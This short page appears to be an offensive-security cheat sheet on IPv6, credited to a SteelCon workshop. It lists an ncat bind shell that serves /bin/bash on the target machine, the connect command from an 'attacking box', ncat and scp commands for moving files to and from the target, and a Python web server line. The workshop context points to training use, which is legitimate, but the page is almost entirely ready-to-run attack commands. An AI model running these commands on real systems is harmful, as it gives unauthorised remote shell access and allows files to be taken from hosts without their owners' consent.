Transfering files

Credit to Roxana Kovaci ( and her SteelCon IPv6 workshop


On the target machine:

ncat -6 -vvlp 4433 -e /bin/bash#

On your attacking box:

ncat -6 -v fe80::37a:61b8:958f:40fb%eth0 4433

Transferring files to and from your target

ncat -6 -vvlp 4433 > test.txt

ncat -6 -v fe80::37a:61b8:958f:40fb%eth0 4433 < test.txt


scp test.txt user@[fe80::37a:61b8:958f:40fb%eth0]:/tmp/

scp user@[fe80::12b:41a7:832a:30bf%eth0]:/tmp/test.txt /home/test/

Web Server

python -m SimpleHTTPServer6 8080

Last updated